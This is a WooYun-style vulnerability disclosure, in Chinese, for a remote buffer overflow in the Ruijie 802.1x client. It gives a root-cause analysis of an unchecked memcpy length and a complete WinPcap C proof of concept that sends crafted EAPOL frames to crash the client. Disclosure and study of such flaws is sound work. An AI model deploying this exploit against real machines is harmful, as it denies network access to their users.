乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-03-11: 积极联系厂商并且等待厂商认领中,细节不对外公开 2013-06-09: 厂商已经主动忽略漏洞,细节向公众公开
锐捷802.1x客户端存在远程缓冲区溢出漏洞,当发送恶意的数据包到客户端,会造成远程缓冲区溢出导致拒绝服务
通过查看IDA反汇编结果,可以看到sub_465920函数中
memcpy拷贝数据的长度是可控的,由程序接收到的数据包中的第26,27字节决定,而程序并未进行有效的校验,导致缓冲区溢出,造成拒绝服务
poc代码:
#include <pcap.h>#pragma comment( lib , "wpcap.lib" )int _tmain(int argc, _TCHAR* argv[]){ pcap_t *fp; char errbuf[PCAP_ERRBUF_SIZE]; u_char packet[3000]; pcap_if_t *alldevs; /* Check the validity of the command line */ if(pcap_findalldevs(&alldevs, errbuf) == -1) { fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf); exit(1); } pcap_if_t *d; int i = 0; /* Print the list */ for(d=alldevs; d; d=d->next) { printf("%d. %s", ++i, d->name); if (d->description) printf(" (%s)\n", d->description); else printf(" (No description available)\n"); } /* 选择相应网卡*/ if ((fp = pcap_open_live(alldevs->name, // name of the device 65536, // portion of the packet to capture. It doesn't matter in this case 1, // promiscuous mode (nonzero means promiscuous) 1000, // read timeout errbuf // error buffer )) == NULL) { fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", argv[1]); return 2; } memset( packet , 0 , 1000 ); /* 目标机器mac地址 */ packet[0]= 0x00; packet[1]= 0x0C; packet[2]= 0x29; packet[3]= 0x0F; packet[4]= 0x63; packet[5]= 0xDD; /* set mac source to 2:2:2:2:2:2 */ packet[6]= 2; packet[7]= 2; packet[8]= 2; packet[9]= 2; packet[10]= 2; packet[11]= 2; /* 协议头 */ packet[12] = 0x88; packet[13] = 0x8e; packet[14] = 0x01; packet[15] = 0x00; packet[16] = 0xFF;//>4 packet[17] = 0xFF;//>4 packet[18] = 0x03; packet[22] = 0x00;// packet[23] = 0x00;// packet[24] = 0x13;// packet[25] = 0x11;// packet[26] = 0xEE;// packet[27] = 0xFF;// /* Send down the packet */ if (pcap_sendpacket(fp, // Adapter packet, // buffer with the packet 100 // size ) != 0) { fprintf(stderr,"\nError sending the packet: %s\n", pcap_geterr(fp)); return 3; } Sleep( 100 ); if (pcap_sendpacket(fp, // Adapter packet, // buffer with the packet 100 // size ) != 0) { fprintf(stderr,"\nError sending the packet: %s\n", pcap_geterr(fp)); return 3; } pcap_close(fp); return 0;}
运行程序
输入用户名和密码点击连接
运行poc代码
客户端程序溢出,并退出
未能联系到厂商或者厂商积极拒绝